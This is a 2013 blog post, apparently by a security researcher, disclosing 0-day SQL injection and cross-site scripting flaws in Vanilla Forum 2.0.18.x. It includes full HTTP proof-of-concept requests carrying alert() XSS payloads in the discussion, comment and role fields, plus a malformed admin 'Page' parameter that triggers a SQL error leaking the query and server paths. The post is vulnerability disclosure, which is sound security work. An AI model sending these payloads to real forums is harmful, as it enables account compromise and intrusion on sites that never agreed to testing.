Wednesday, 17 July 2013

[EN] Vanilla Forum SQL Injection 0day - Updated

Durning one of my projects related to webapp security testing
I found an interesting 0day vulnerability in Vanilla Forum.

Below is the screen with the vulnerable parameter.

As I saw durning information gathering, here is another one
SQL Injection vulnerability, so it is a similar story.

(This time) this bug can be reproducet in 2.0.18.4 and 2.0.18.8 version.

Check it out:

Proof of concept will not be public right now.


* Update (after 1h) *

After some code review I found that in admin panel we have also SQL Injection
vulnerability. Beside, a lots of XSS (stored/reflected, whatever).


* Update 19.07.2013 *

Below you'll find a description of few other vulnerabilities found in this (latest)
version of Vanilla Forum.

  • XSS when adding new discusion
To exploits this vulnerability, request should looks like this:


---< code >---
POST /vc/index.php?p=/post/discussion HTTP/1.1
Host: 192.168.255.105
(...)
Cache-Control: no-cache

Discussion%2FTransientKey=DTUVYD8CV0SF&Discussion%2Fhpt=
&Discussion%2FDiscussionID=&Discussion%2FDraftID='"<img+src=x%20onerror=alert(1)>
&Discussion%2FName=asdasdasd&Discussion%2FCategoryID=1&Discussion%2FBody=
asdasdasdasdasdasd&Checkboxes%5B%5D=Announce&Checkboxes%5B%5D=
Closed&DeliveryType=VIEW&DeliveryMethod=JSON&Discussion/Post_Discussion=Post Discussion
---< code >---

After this request you will see response contains XSS code:

---< code >---
{"DiscussionID":"77","DraftID":"'\"<img src=x
onerror=alert(1)>","FormSaved":true,"DeliveryType":"VIEW","Data":"PGRpdiWRk(...)
---< code >---

  •  Another XSS - this time in comments:

 ---< code >---
POST /vc/index.php?p=/vanilla/post/comment/1 HTTP/1.1
Host: 192.168.255.105
(...)
Cache-Control: no-cache

Comment%2FTransientKey=DTUVYD8CV0SF&Comment%2Fhpt=
&Comment%2FDiscussionID=1&Comment%2FCommentID=
&Comment%2FDraftID='"`<img%20src=x%20onerror=alert(2)>
&Comment%2FBody=asdasdasdasdasdasd&DeliveryType=VIEW
&DeliveryMethod=JSON&Type=Post&Comment/LastCommentID=0
---< code >---

And response:
---< code >---
Ajax"}],"CommentID":"131","DraftID":"'\"`<img src=x onerror=alert(2)>","MyDrafts":"My Drafts",
"CountDrafts":0,"FormSaved":true,"DeliveryType":"VIEW","Data":"PGRpdiBjbGFzczAg(...)
---< code >---


  • Nice persistent XSS - when editing roles ('description' is vulnerable):

Response for this one:
---< code >---
(...)

         <strong>Guest</strong>
                  <div>
            <a href="/vc/index.php?p=/role/edit/2" class="SmallButton">Edit</a>         </div>
               </td>
      <td class="Alt">'>"><body onload=alert(/4321/)></td>
   </tr>
   <tr id="4" class="Alt">
(...)
---< code >---

Another SQL Injection bug - this time located in admin panel:

---< code >---
POST /vc/index.php?p=/dashboard/settings/bans&Page=11111111111111111111111& HTTP/1.1
Host: 192.168.255.105
(...)
Connection: close

DeliveryType=VIEW
---< code >---

Check the response:
---< code >---
HTTP/1.1 500 Internal Server Error
Date: Wed, 17 Jul 2013 13:10:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 1633
Connection: close
Content-Type: text/html; charset=utf-8

<h1>FATAL ERROR IN: Gdn_Database.Query();</h1>
<div class="AjaxError">"You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to
 use near '2.2222222222222E+23, 20' at line 5"

select Ban.*, iu.Name as `InsertName`
from GDN_Ban Ban
left join GDN_User iu on Ban.InsertUserID = iu.UserID
order by BanType, BanValue asc
limit 2.2222222222222E+23, 20
LOCATION: /var/www/vc/library/database/class.database.php
> 283:          $PDOStatement = $this->Connection()->query($Sql);
> 284:       }
> 285:
> 286:       if ($PDOStatement === FALSE) {
>>> 287:          trigger_error(ErrorMessage($this->GetPDOErrorMessage($this->Connection()->errorInfo()), $this->ClassName, 'Query', $Sql), E_USER_ERROR);
> 288:       }
> 289:     
> 290:       // Did this query modify data in any way?
> 291:       if ($ReturnType == 'ID') {
BACKTRACE:
[/var/www/vc/library/database/class.database.php] PHP::Gdn_ErrorHandler();
[/var/www/vc/library/database/class.database.php 287] PHP::trigger_error();
[/var/www/vc/library/database/class.sqldriver.php 1657] Gdn_Database->Query();
[/var/www/vc/library/database/class.sqldriver.php 941] Gdn_SQLDriver->Query();
[/var/www/vc/library/core/class.model.php 383] Gdn_SQLDriver->GetWhere();
[/var/www/vc/applications/dashboard/controllers/class.settingscontroller.php 275] Gdn_Model->GetWhere();
[/var/www/vc/applications/dashboard/controllers/class.settingscontroller.php 275] SettingsController->Bans();
[/var/www/vc/library/core/class.dispatcher.php 322] PHP::call_user_func_array();
[/var/www/vc/index.php 53] Gdn_Dispatcher->Dispatch();
</div>
---< code >---

So as you can see we have here also information disclosure bug,
because attacker will see full path to Vanilla-instalation.

If you have any questions, or want to test your web/infrastructure,
just mail me your question(s). I will answer ASAP.

Enjoy ;)

1 comment:

What do You think...?